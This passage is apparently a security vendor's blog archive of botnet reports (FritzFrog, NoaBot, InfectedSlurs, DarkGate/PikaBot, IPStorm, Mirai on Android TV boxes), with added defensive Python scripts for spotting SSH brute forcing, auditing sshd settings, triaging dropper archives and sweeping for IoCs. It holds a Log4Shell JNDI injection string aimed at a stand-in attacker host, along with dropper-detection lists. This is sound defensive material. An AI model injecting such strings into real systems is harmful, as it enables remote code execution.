Botnet Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/botnet/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated Fri, 02 Feb 2024 15:33:00 +0000

New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit
https://gridinsoft.com/blogs/fritzfrog-botnet-exploits-log4shell-pwnkit/
Fri, 02 Feb 2024 15:33:00 +0000

The post New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit appeared first on Gridinsoft Blog.

Researchers have detected a new sample of FritzFrog, a malware family known for building large peer-to-peer botnets. The new sample can exploit flaws in network assets, including the infamous Log4Shell vulnerability. As it turns out, two years after the flaw's disclosure and a frantic round of patching, plenty of vulnerable instances remain.

FritzFrog Botnet is Back, Spreads with Exploitation of Web Vulnerabilities

Research from Akamai Labs describes a FritzFrog version armed with a set of exploitation capabilities. The report pays particular attention to its Log4Shell exploitation, which is performed in an unusual way. When the flaw was disclosed, organizations concentrated on patching the internet-facing parts of their infrastructure, while internal hosts running Apache Log4j were often left alone because they were considered unlikely targets. FritzFrog goes after exactly those hosts: once it has a foothold inside a network, it scans internal assets for Log4Shell.

Log4Shell (CVE-2021-44228) lets an attacker obtain remote code execution by getting a JNDI lookup string such as ${jndi:ldap://attacker/x} into any message that a vulnerable Log4j instance logs. FritzFrog first scans for candidate hosts by probing ports 9000, 8090 and 8888. Because it cannot know which request fields the application logs, it then sends HTTP requests with the lookup string placed in many headers at once, so that at least one copy ends up in a log line and triggers the lookup.

Example of an HTTP request sent to a vulnerable application: every header field carries a copy of the injected lookup string.

Aside from Log4Shell, the malware has also gained the ability to exploit PwnKit (CVE-2021-4034), a flaw in the pkexec component of polkit, the privilege-control utility present in most Linux distributions. If FritzFrog finds that it is running with less than root privileges, it uses this flaw to escalate.

What is FritzFrog?

FritzFrog is a fairly old malware family, tracked since March 2020. As a peer-to-peer botnet it quickly racked up a significant number of attacks, yet the activity ceased in September 2020. In December of the same year it resurfaced with even more aggressive activity and appears to have been active ever since.

FritzFrog statistics 2020

Since its first days it has used SSH brute forcing to propagate. It is surprising how many internet-exposed hosts still have weak login credentials today. After a successful login, FritzFrog starts scanning thousands of other IP addresses for further weakly protected servers. Besides self-propagation, the malware can deliver other malware, provide remote access to the infected environment and perform DDoS attacks.

Protection Against SSH-Targeting Malware

Apart from its peer-to-peer architecture, FritzFrog's infection vectors are nothing new. Brute forcing weakly protected servers is a decades-old tactic, and both vulnerabilities date from 2021. Patches for Log4j and polkit have long been available; apply them, including on internal hosts that are not exposed to the internet, and FritzFrog, like any other malware relying on these flaws, will have far fewer ways in.

Countermeasures against SSH brute force are well known and easy to implement. Allow SSH only from trusted networks, prefer key-based authentication and disable password login, and rate-limit or ban sources that keep failing. Moving SSH to a non-standard port reduces noise from automated scanners but is not a security control on its own. Strong passwords (or better, keys) stop the attack from succeeding, but they do not by themselves relieve the load that a flood of login attempts puts on the server; rate limiting does. All these measures should work together, which makes each of them much more effective.
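The flood of failed logins mentioned above is easy to spot in sshd's own log lines. The following Python script is an added example (not part of the original post) of the sliding-window rule that tools like fail2ban apply: it parses OpenSSH "Failed password" lines from a syslog-style auth.log and reports sources that exceed a threshold of failures within a short window, together with how many usernames they tried. The log excerpt is constructed for the example, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, Iterator, Tuple

# OpenSSH failure lines as written to /var/log/auth.log (syslog timestamp, no year).
_FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(lines: Iterable[str], year: int = 2024) -> Iterator[Tuple[datetime, str, str]]:
    """Yield (timestamp, username, source IP) for every failed password login."""
    for line in lines:
        m = _FAILED.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())           # "Feb  2" -> "Feb 2"
        yield datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"), m["user"], m["ip"]


def brute_force_sources(lines: Iterable[str], threshold: int = 5,
                        window_seconds: int = 60) -> Dict[str, Tuple[int, int]]:
    """Return {ip: (peak failures inside one window, distinct usernames tried)}.

    A source is reported once it accumulates `threshold` failures within any
    `window_seconds`-long sliding window, the same logic a fail2ban jail applies.
    """
    recent: Dict[str, deque] = defaultdict(deque)
    users: Dict[str, set] = defaultdict(set)
    flagged: Dict[str, Tuple[int, int]] = {}
    for ts, user, ip in parse_failures(lines):
        window = recent[ip]
        window.append(ts)
        users[ip].add(user)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()                        # drop failures older than the window
        if len(window) >= threshold:
            peak = max(len(window), flagged.get(ip, (0, 0))[0])
            flagged[ip] = (peak, len(users[ip]))
    return flagged


# Constructed log excerpt, not a real capture: one dictionary attack and one admin typo.
SAMPLE_LOG = """\
Feb  2 15:33:00 srv1 sshd[1201]: Failed password for root from 198.51.100.23 port 51234 ssh2
Feb  2 15:33:01 srv1 sshd[1203]: Failed password for invalid user admin from 198.51.100.23 port 51236 ssh2
Feb  2 15:33:02 srv1 sshd[1205]: Failed password for invalid user oracle from 198.51.100.23 port 51238 ssh2
Feb  2 15:33:03 srv1 sshd[1207]: Failed password for invalid user test from 198.51.100.23 port 51240 ssh2
Feb  2 15:33:04 srv1 sshd[1209]: Failed password for root from 198.51.100.23 port 51242 ssh2
Feb  2 15:33:05 srv1 sshd[1210]: Accepted publickey for deploy from 192.0.2.10 port 40122 ssh2: ED25519 SHA256:c0ns7ruct3d
Feb  2 15:40:00 srv1 sshd[1300]: Failed password for alice from 192.0.2.10 port 40130 ssh2
Feb  2 15:45:00 srv1 sshd[1301]: Failed password for alice from 192.0.2.10 port 40131 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, (peak, distinct) in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {peak} failures within 60 s across {distinct} usernames -> ban candidate")
```

The legitimate user who mistypes a password twice in ten minutes stays below the threshold, while the scanner cycling through root, admin, oracle and test is flagged after five attempts in five seconds. Feeding the flagged addresses into a firewall set is what turns the detection into the rate limiting the text recommends.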

NoaBot Botnet: The Latest Mirai Offspring
https://gridinsoft.com/blogs/noabot-botnet-the-latest-mirai-offspring/
Thu, 11 Jan 2024 19:34:58 +0000

A new botnet called NoaBot emerged in early 2023. It targets SSH servers and uses them for cryptocurrency mining, building on the Mirai code base while adding several detection-evasion tricks.

NoaBot Involved in Crypto Mining

Cybersecurity experts have discovered a new botnet called NoaBot. It has been active since at least the beginning of 2023, and its purpose is illicit crypto mining. It is based on Mirai, the notorious malware that harnesses infected IoT devices for large-scale network attacks. Despite being a derivative, it keeps all of Mirai's functionality, which should not be underestimated.

Malware activity

NoaBot's primary strategy is an SSH scanner that looks for servers it can brute-force, after which it deploys its own SSH public key for persistent remote access. Unlike earlier Mirai variants, it is compiled against uClibc rather than glibc, which changes its signature enough that antivirus engines tend to label it a generic SSH scanner or trojan instead of Mirai.

What’s Under the Hood of NoaBot?

As mentioned, NoaBot is built on the Mirai botnet, whose source code leaked in 2016. At the core of its operations is a modified XMRig coin miner; XMRig is open source and widely used for legitimate mining, but it is equally popular with attackers. NoaBot also carries a wormable self-spreader and an SSH key backdoor, which let it download and execute additional binaries and reach new victims.

NoaBot's lateral movement relies on SSH dictionary attacks against weak or default passwords. What sets it apart among mining malware is the obfuscation of its configuration and the use of a custom mining pool, which hides the miner's wallet address and obscures how profitable the scheme is. The researchers suspect that NoaBot's authors also reuse code from the Rust-based P2PInfect worm that emerged in July 2023, because some P2PInfect samples contain the same strings and inside jokes found in NoaBot, such as lyrics from game-related pop songs.

The song lyrics in the code

Global Impact

Victimology analysis shows that the honeypots were attacked from 849 distinct source IPs across 2023. Their geolocation was spread fairly evenly around the globe, which fits the wormable nature of the malware: every infected victim becomes an attacker. One hotspot stood out, however: sources in China accounted for almost 10% of all attacks observed in 2023.

Miner botnets are nothing new, but one that targets Linux machines and spreads on its own is less common. The many IoT devices susceptible to NoaBot can bring its creators considerable profit: a smart fridge or washing machine has little computing power, but sheer numbers make up the difference.

Safety Recommendations

Since the attack relies on plain SSH dictionary attacks, the logical defenses are to restrict SSH access from the internet to trusted sources, to prefer key-based authentication over passwords (and use strong passwords where they remain), and to close any services and ports that do not need to be exposed. These steps already cut the chance of malware deployment regardless of its type or source.
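Both this recommendation and the "Protection Against SSH-Targeting Malware" section of the FritzFrog post above boil down to a handful of sshd_config directives. The Python audit below is an added example (not code from Gridinsoft or from either research report): it parses the global section of an sshd_config, compares the effective settings against OpenSSH's defaults, and lists the directives that leave a host open to dictionary attacks. The two configurations are constructed for the example, and the defaults table is an assumption that should be checked against `sshd -T` on the actual host.

```python
from typing import Dict, List, Tuple

# OpenSSH defaults used when a directive is absent (an assumption of this example;
# run `sshd -T` on the host to see the effective values).
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
}


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return the global directives of an sshd_config, keyword lowercased.

    sshd uses the first occurrence of a keyword, and everything after the first
    `Match` line is conditional, so parsing stops there (Match blocks are not audited).
    """
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in cfg:
            cfg[key] = parts[1].strip()
    return cfg


def audit_sshd_config(text: str) -> List[Tuple[str, str]]:
    """Return (directive, recommendation) pairs for settings that help SSH brute forcing."""
    cfg = parse_sshd_config(text)

    def effective(key: str) -> str:
        return cfg.get(key, DEFAULTS[key]).lower()

    findings: List[Tuple[str, str]] = []
    if effective("passwordauthentication") != "no":
        findings.append(("PasswordAuthentication", "set to no; dictionary attacks need password logins"))
    if effective("kbdinteractiveauthentication") != "no":
        findings.append(("KbdInteractiveAuthentication", "set to no; it can still prompt for a password"))
    if effective("pubkeyauthentication") != "yes":
        findings.append(("PubkeyAuthentication", "set to yes; keys are the login method once passwords are off"))
    if effective("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append(("PermitRootLogin", "set to no; root is the first account every scanner tries"))
    if int(effective("maxauthtries")) > 3:
        findings.append(("MaxAuthTries", "lower to 3; fewer guesses per connection"))
    if not ("allowusers" in cfg or "allowgroups" in cfg):
        findings.append(("AllowUsers", "restrict logins to named accounts, optionally user@source-network"))
    return findings


# Constructed configurations, not taken from any real host.
WEAK_CONFIG = """
# stock-like settings that NoaBot- or FritzFrog-style scanners rely on
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
#AllowUsers deploy
"""

HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
MaxAuthTries 3
AllowUsers deploy@192.0.2.0/24 backup
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}:")
        for directive, advice in audit_sshd_config(text) or [("ok", "no findings")]:
            print(f"  {directive}: {advice}")
```

After changing the file, validate it with `sshd -t` and keep an existing session open until a fresh key-based login succeeds. The audit deliberately ignores Match blocks, which can re-enable password authentication for specific users or addresses, and it does not replace a firewall rule that limits which networks can reach port 22 at all.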

InfectedSlurs Botnet Exploits Zero-Days to Spread Mirai Malware
https://gridinsoft.com/blogs/infectedslurs-botnet-mirai-malware/
Mon, 27 Nov 2023 15:25:09 +0000

The InfectedSlurs botnet, a sophisticated cyber threat, has been uncovered by the Akamai SIRT. The campaign uses zero-day exploits to spread the notorious Mirai malware and poses a significant risk to vulnerable devices worldwide.

InfectedSlurs Helps Mirai Botnet to Resurface

The InfectedSlurs botnet has strong ties to Mirai, specifically the older JenX variant, which gained notoriety for recruiting IoT devices and, in JenX's case, for its links to the Grand Theft Auto gaming community. A side-by-side comparison of an April 2023 variant with the October 2023 campaign shows the Mirai code largely unchanged, suggesting no significant modifications.

Why are InfectedSlurs Attacks Unique?

Using its global network of honeypots, the Akamai SIRT noticed activity against a seldom-used TCP port in late October 2023. The probing started at a low rate, climbed to a peak of 20 attempts per day, then settled at an average of two to three attempts a day. The targeted devices were not identified until November 9, 2023.

InfectedSlurs malware spreading scheme

The attackers first authenticate to the device with a POST request and, if that succeeds, follow up with a command-injection exploit. Investigation pinned down the specific HTTP exploit path and target port. The Server header in the device's HTTP response contains internet slang, which at first made the researchers suspect they were looking at another honeypot or a prank.

Botnet Targets

Further analysis showed that the exploited devices belong to a specific niche: real-time streaming protocol (RTSP) enabled devices, particularly CCTV/NVR/DVR security cameras. The attack exploits a zero-day vulnerability in NVR devices from a vendor that has not yet been named. Remarkably, the authentication step uses the default administrative credentials documented by the manufacturer, which many owners never change.

At the same time, a second zero-day surfaced, affecting outlet-based wireless LAN routers designed for hotel and residential use. That vendor, also unnamed, plans to release details in December 2023. Both vendors are working on patches; until then, the community is urged to remain vigilant.

Reacting to activity

InfectedSlurs underscores the value of proactive security measures. Honeypots, as the Akamai SIRT's detection shows, offer crucial early insight into evolving threats.

  • Change default credentials on every device before it goes online; this campaign authenticated with the manufacturer's documented defaults. Stay informed about emerging threats.
  • Feed device and network logs into SIEM/SOAR tooling so that exploitation attempts can be detected, stopped and blocked across the whole environment.
  • Segment IoT devices and apply zero-trust policies: a camera, NVR or hotel router should not be able to reach arbitrary internal hosts or the internet beyond what its function requires, which limits what an infected device can do even when the exploit itself is unknown.
  • Install patches regularly, since they fix known vulnerabilities; neglecting this undermines every other measure.

DarkGate and Pikabot Copy the QakBot Malware
https://gridinsoft.com/blogs/darkgate-pikabot-qakbot/
Mon, 27 Nov 2023 10:56:41 +0000

According to researchers, the phishing campaign distributing the DarkGate and PikaBot malware is run by the authors or successors of the QBot trojan (aka QakBot). Security specialists consider it the most complex phishing campaign to appear since QBot was taken down.

Is Pikabot A New QakBot?

In its report, Cofense says that the tactics and techniques of the DarkGate and Pikabot campaign resemble earlier QakBot (aka Qbot) campaigns, so it appears that the Qbot operators have simply switched to new botnets and malware. QBot was one of the largest botnets and spread via email; DarkGate and Pikabot are modular malware loaders with the same functions as QBot.

The similarity of the campaigns can be concluded from the intercepted email threads used as the initial infection vector, from URLs with unique patterns that limit user access, and from an infection chain almost identical to the one we saw with QakBot delivery. The malware families used also correspond to what can be called the QakBot legacy, Cofense experts explain.

As with QBot, the attackers use the new loaders to gain initial access to victims' networks, followed by ransomware attacks, espionage and data theft. Some cybersecurity experts had predicted that the malware, or its operators, would return.

Features of the phishing campaign of the QBot heirs

According to Cofense, the volume of malicious emails spreading DarkGate rose significantly over the summer, and in October 2023 the attackers switched to Pikabot as their main payload. The phishing emails appear as replies or forwards within previously stolen email threads, which makes recipients more likely to trust the message.

Users who click on a URL from such an email go through a series of checks and are then prompted to download a ZIP archive. This archive contains a dropper that retrieves the final payload from a remote source.

Example of a malicious email distributing DarkGate and PikaBot

The researchers note that the attackers experimented with several droppers to determine which one worked best, including:

  • JavaScript droppers that download and execute PE executables or DLLs;
  • an Excel-DNA loader, based on an open-source project for building XLL add-ins, used here to download and run malware;
  • VBS loaders, which execute malware via .vbs files embedded in Microsoft Office documents or launch command-line executables;
  • LNK downloaders, which use .lnk shortcut files to download and execute malware.
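Every one of these droppers reaches the victim inside the ZIP archive mentioned above, so mail-gateway triage of the archive is the cheapest place to catch them. The Python script below is an added example (not code from Cofense or Gridinsoft) of that triage: it opens an archive in memory and flags members by extension, by double extension, and by the first bytes of their content, so that a PE renamed to .xll, a shortcut hidden behind a document-looking name, or a nested archive is caught regardless of its name. The archive is constructed with inert placeholder bytes for the example; the extensions beyond the four named in the text (.jse, .vbe, .wsf, .hta) are an assumption about sibling formats, not something the report lists.

```python
import io
import zipfile
from typing import Dict, List

# Dropper types named in the campaign (JS, XLL, VBS, LNK). The rest are an assumption:
# sibling script and shortcut formats that the same loaders are commonly packaged as.
DROPPER_EXTENSIONS = {".js", ".xll", ".vbs", ".lnk", ".jse", ".vbe", ".wsf", ".hta"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png"}


def triage_zip(data: bytes) -> Dict[str, List[str]]:
    """Return {member name: reasons} for archive members that look like droppers.

    Both the file name and the first bytes are examined, so a PE renamed to .xll,
    a .lnk hidden behind a document-looking name, and nested archives are all caught.
    """
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lowered = name.lower()
            ext = "." + lowered.rsplit(".", 1)[1] if "." in lowered else ""
            with archive.open(info) as member:
                head = member.read(4)
            reasons: List[str] = []
            if ext in DROPPER_EXTENSIONS:
                reasons.append(f"dropper extension {ext}")
            stem = lowered[: -len(ext)] if ext else lowered
            if any(stem.endswith(doc) for doc in DOCUMENT_EXTENSIONS):
                reasons.append("double extension disguised as a document")
            if head.startswith(b"MZ"):
                reasons.append("PE executable content (XLL files are DLLs)")
            elif head.startswith(b"L\x00\x00\x00"):
                reasons.append("Windows shortcut (LNK) content")
            elif head.startswith(b"PK\x03\x04"):
                reasons.append("nested archive")
            if reasons:
                findings[name] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure archive with inert placeholder bytes, not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        # .lnk header: HeaderSize 0x4C little-endian, then the ShellLink CLSID prefix.
        archive.writestr("Invoice_2023-10.pdf.lnk", b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 16)
        archive.writestr("Payment details.js", b"var shell = new ActiveXObject('WScript.Shell');")
        archive.writestr("Report.xll", b"MZ\x90\x00" + b"\x00" * 60)   # DOS stub signature only
        archive.writestr("readme.txt", b"Please see the attached files.")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_archive()).items():
        print(f"{member}: {'; '.join(reasons)}")
```

Content checks matter more than names here: a gateway that only blocks ".js" attachments is beaten by renaming, whereas a shortcut file still starts with its fixed header and an XLL add-in is still a PE image whatever it is called.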

The final payload used in these attacks until September 2023 was DarkGate, which was replaced by PikaBot in October 2023.

How dangerous are DarkGate and PikaBot?

DarkGate is modular malware that supports various kinds of malicious behavior. It first appeared back in 2017, but only became widely available to other criminals in the summer of 2023, which led to a sharp increase in its distribution. Its key features include hVNC remote access, cryptocurrency mining, reverse shell creation, keylogging and theft of data from the infected machine.

PikaBot, in turn, is newer malware that first appeared in early 2023. It consists of a loader and a core module with anti-debugging, anti-VM and anti-emulation checks. On the infected machine it profiles the system and sends the collected data to the command-and-control server, then waits for instructions; the server responds with commands to load and execute modules as DLL or PE files, shellcode or command-line commands. All this makes PikaBot a versatile tool.

What is QakBot notorious for?

QakBot, active since 2008, started as a banking trojan but evolved over time into a powerful malware loader capable of deploying additional payloads, stealing information and enabling lateral movement. Its campaigns are most likely linked to Russian-speaking hackers, who kept improving the malware's distribution methods.

In 2020 QBot first entered the lists of the most widespread malware in the world, and it kept making headlines for the next three years. One of its more notable infection vectors was the Follina zero-day (CVE-2022-30190) in the Windows Support Diagnostic Tool (MSDT).

However, in August 2023 the FBI, together with several international law enforcement agencies, carried out Operation Duck Hunt, which dismantled the QBot (QakBot) infrastructure.

The FBI gained access to the group's infrastructure, including a computer belonging to one of its administrators, and then used QBot's own distribution channel to push an uninstaller to infected machines, which removed the malware from more than 700,000 devices worldwide. As we see, though, the legacy of the QBot botnet lives on.

IPStorm Botnet Stopped by the FBI, Operator Detained
https://gridinsoft.com/blogs/ipstorm-botnet-stopped-fbi/
Thu, 16 Nov 2023 14:35:08 +0000

The FBI has dismantled the notorious IPStorm botnet and apprehended its operator. The takedown took place in September, and the key operator, Sergei Makinin, was detained around the same time.

FBI Dismantles IPStorm Botnet

The Federal Bureau of Investigation has shut down the notorious IPStorm botnet, ending the threat it posed to thousands of infected devices worldwide. Its operator, Sergei Makinin, a Russian and Moldovan national, has been arrested and has admitted to earning more than half a million dollars by selling access to compromised devices.

Started by Makinin in 2019, IPStorm grew to more than 20,000 infected computers over its lifetime. The infrastructure let threat actors route traffic covertly through compromised devices. IPStorm had builds for Windows, Linux, macOS and Android, which widened its reach and made it harder to spot.

IPStorm Botnet Timeline

As noted above, between June 2019 and December 2022 Makinin developed and operated the IPStorm malware. It was designed to spread across devices worldwide, take control of them and knit them into a single botnet whose main purpose was to turn compromised devices into proxies. He succeeded: access to these proxies was sold through the dedicated websites proxx.io and proxx.net, a marketplace for criminals looking for covert, hard-to-trace communication channels.

IPStorm botnet samples gathered by Intezer, showing when the malware first appeared

According to the US Department of Justice (DoJ), Makinin pleaded guilty to seizing control of thousands of electronic devices worldwide and profiting by selling unauthorized access to them. The DoJ states that he offered access to more than 23,000 infected devices, referred to as proxies, often charging hundreds of dollars per month. Makinin admitted to at least $550,000 in revenue from renting out the botnet, which underlines the financial motive behind building and maintaining such infrastructure.

Legal Actions and Continuing Threats

Although the IPStorm botnet has been taken down, the legal action did not cover the IPStorm malware still present on infected devices, so compromised systems remain affected even though the botnet itself is incapacitated. Unlike the earlier FBI operation against QakBot, this one did not instruct the malware to remove itself from devices.

Either way, the FBI's recent choice of targets is telling. Beheading small, scattered ransomware groups can be hard, whereas the huge botnets that serve ransomware actors and many other kinds of criminals are an easier, yet still effective, target.

IoT Malware Attacks Grow by 400% in 2023
https://gridinsoft.com/blogs/iot-malware-attacks-400-percent-growth/
Mon, 30 Oct 2023 13:37:21 +0000

IoT malware has been a major concern for the last decade, and the trend is getting worse: recent Zscaler research shows 400% growth in IoT malware attacks in 2023 alone, and it will most likely continue.

Massive jump in attacks on IoT infrastructure

According to the study, the number of IoT devices keeps growing, and the number of attacks grows along with it: in the last six months alone, attacks on IoT devices increased 400% year over year. These devices were created for convenience, but attackers see them differently. The IoT, a vast network of interconnected devices, permeates our daily lives, and anything that runs firmware and is reachable over the network will sooner or later be turned to criminal use.

The research also shows that attackers commonly target vulnerabilities that have been public for more than three years. Their goal is obvious: building vast botnets from infected devices. About 66% of the malware families observed are backdoors that support botnet creation. The leader is Mirai, with a 45.9% share, followed by Gafgyt at 20.3% of infected devices. The main use of such botnets is DDoS attacks against enterprises, and DDoS capacity is routinely offered for sale on darknet markets, where demand has stayed high for years.

Ranking of IoT malware types

Manufacturing Is The Most Targeted Industry

Today the manufacturing sector has nearly three times as many unique IoT devices as other industries, which reflects its push for automation and digitization. As this digitalization means adding smart sensors and devices, it also expands the attack surface. Not surprisingly, manufacturing receives more than three times as many attacks as any other sector in an average week and accounts for 54.5% of malware attacks.

The problem is that many IoT devices are built for ease of use and accessibility rather than security, so they ship with weaknesses attackers can exploit. Attacks on OT infrastructure can significantly disrupt critical industrial processes and, in some cases, threaten lives. The most affected industries are automotive, heavy manufacturing, plastics and rubber.

Which Countries are at IoT Malware Risk?

According to the report, the U.S., Mexico, Brazil and Colombia are the most targeted countries. While 96% of IoT malware is distributed from compromised devices in the U.S., three of the four most affected countries are in Latin America. The abundance of infected devices in the U.S. follows from its high level of IoT adoption: besides consumer devices, many are attached to critical infrastructure or enterprise networks, which makes compromising them profitable.

Latin American countries are particularly exposed to IoT malware: Mexico alone accounts for 46% of all infections, owing to relatively low cybersecurity awareness and preparedness as well as proximity to the U.S. The education sector has also become a prime target because of the widespread use of unsecured and shadow IoT devices on school networks, which give attackers easy access points to the sensitive personal data those institutions store. Attacks on this sector have risen by a staggering 961%, which demands immediate attention to protect the privacy and security of students, faculty and staff.

How to Protect Against IoT Malware?

While there is no perfect defense, there are preventative measures that can help avoid most of these problems. The following recommendations will reduce the risk of device compromise:

  • Train employees on IoT device security. Forewarned is forearmed: people are the weakest link in the defense, so security training is an effective measure.
  • Apply a zero-trust policy. Zero trust removes implicit trust: every device and user is untrusted by default, and unauthorized shadow IoT devices are kept away from corporate data, for example by forcing their traffic through a proxy that denies them by default.
  • Maintain full visibility into IoT devices. You cannot secure devices you do not know about, so inventory everything connected to the network, including unmanaged devices, and watch what they do; solutions that analyze network logs help monitor their communications and activity.
  • Use multi-factor authentication. It adds a layer of security by requiring a second form of verification in addition to the password, so stolen credentials alone do not grant access and lateral movement from a compromised device becomes harder.

Mirai variant “Pandora” infects Android TV for DDoS attacks
https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/
Sat, 09 Sep 2023 12:07:20 +0000

A new variant of the Mirai botnet has been detected infecting low-cost Android TV set-top boxes, which millions of people use for media streaming. According to the analysts, the trojan is a fresh edition of the ‘Pandora’ backdoor first identified in 2015.

The campaign targets cheap Android TV boxes such as the Tanix TX6, MX10 Pro 6K and H96 MAX X3. Their quad-core processors are enough to mount powerful DDoS attacks even from a small swarm.

Mirai Botnet Aims Android-based TV Boxes

The malware reaches devices in two ways: through malicious firmware updates signed with publicly available test keys, and through malicious apps distributed on sites aimed at users looking for pirated content. In the first case the firmware is either installed by resellers of the devices or downloaded by users who are lured with promises of unrestricted streaming or better app compatibility.

The malicious service is planted in ‘boot.img’, the file that holds the kernel and ramdisk loaded during Android boot-up. That makes it an excellent persistence mechanism: the service starts before any app does and, unlike an app living in the data partition, it is not removed by a factory reset.

[Image: Malicious service]

The second distribution channel is apps for pirated content, which offer collections of copyrighted TV shows and movies for free or at a low cost. Security researchers have identified Android apps that drop the new Mirai variant onto the device. Here is an example:

[Image: Site dropping malware]

In this case, the malicious apps surreptitiously start ‘GoMediaService’ on their first launch and register it to auto-start when the device boots up.

When the ‘gomediad.so’ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1’) and an installer for the Pandora backdoor (‘.tmp.sh’).

[Image: GoMedia service structure]

Once activated, the backdoor establishes communication with the C2 server, replaces the HOSTS file, updates itself, and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks over TCP and UDP, including SYN, ICMP, and DNS floods. It can also open a reverse shell, mount system partitions for modification, and perform other functions.

[Image: Mirai botnet IoCs]
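To turn the indicators above into a check a practitioner can actually run, here is an added Python example; it is not code from the original article or from the researchers who analysed the sample. It sweeps a directory tree pulled from a box (for instance with `adb pull`) or a mounted firmware image for the file names mentioned above, for the GoMediaService hook in init scripts, for a tampered HOSTS file, and for the `ro.build.tags=test-keys` marker that identifies a ROM signed with the public AOSP test keys. The article does not give the on-disk locations of the dropped files, so the script walks the whole tree; the assumption that a stock hosts file carries only loopback entries, and the sample tree the script builds for the demo, are both constructed for this example.

```python
"""Offline IoC sweep for the Pandora/Mirai Android TV box infection.

Added example, not code from the original article. Point it at a tree pulled
from the device (e.g. `adb pull /system ./box/system`) or a mounted image.
"""
import os
import re
import tempfile

# File names taken from the article; their exact locations on disk are not
# stated there, so the sweep walks the whole tree (assumption).
SUSPICIOUS_FILES = {"gomediad.so", ".tmp.sh", "Tool.AppProcessShell.1"}
SERVICE_NAME = "GoMediaService"
# Assumption: a stock box only carries loopback entries in its hosts file.
LOOPBACK = {"127.0.0.1", "::1"}
HOSTS_LINE = re.compile(r"^\s*(\S+)\s+(\S+)")

def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")

def build_tags(root):
    """ro.build.tags from system/build.prop; 'test-keys' means the ROM was
    signed with the publicly available AOSP test keys."""
    path = os.path.join(root, "system", "build.prop")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                if line.strip().startswith("ro.build.tags="):
                    return line.strip().split("=", 1)[1]
    except OSError:
        pass
    return None

def find_artifacts(root):
    """Dropped files, matched by name anywhere under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits += [_rel(os.path.join(dirpath, f), root) for f in files if f in SUSPICIOUS_FILES]
    return sorted(hits)

def find_service_refs(root):
    """Init scripts (*.rc) that register GoMediaService: the auto-start hook."""
    refs = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".rc"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if SERVICE_NAME in fh.read():
                        refs.append(_rel(path, root))
            except OSError:
                continue
    return sorted(refs)

def suspicious_hosts_entries(root):
    """Hosts mappings to anything other than loopback, i.e. a replaced HOSTS file."""
    path = os.path.join(root, "system", "etc", "hosts")
    found = []
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                m = HOSTS_LINE.match(line.split("#", 1)[0])
                if m and m.group(1) not in LOOPBACK:
                    found.append((m.group(1), m.group(2)))
    except OSError:
        pass
    return found

def sweep(root):
    return {
        "build_tags": build_tags(root),
        "artifacts": find_artifacts(root),
        "service_refs": find_service_refs(root),
        "hosts": suspicious_hosts_entries(root),
    }

def is_infected(report):
    """test-keys alone is only a warning (cheap boxes often ship that way);
    any of the other three findings is treated as a positive."""
    return bool(report["artifacts"] or report["service_refs"] or report["hosts"])

def build_sample_tree():
    """Constructed sample tree carrying the article's indicators (demo data only)."""
    root = tempfile.mkdtemp(prefix="tvbox-")
    os.makedirs(os.path.join(root, "system", "etc"))
    os.makedirs(os.path.join(root, "data", "local", "tmp"))
    with open(os.path.join(root, "system", "build.prop"), "w", encoding="utf-8") as fh:
        fh.write("ro.product.model=TX6\nro.build.tags=test-keys\n")
    with open(os.path.join(root, "system", "etc", "hosts"), "w", encoding="utf-8") as fh:
        fh.write("127.0.0.1 localhost\n::1 ip6-localhost\n"
                 "203.0.113.7 update.vendor.invalid  # constructed entry\n")
    with open(os.path.join(root, "init.rc"), "w", encoding="utf-8") as fh:
        fh.write("service GoMediaService /system/bin/gomediad.so\n    class main\n")
    for name in ("gomediad.so", ".tmp.sh"):
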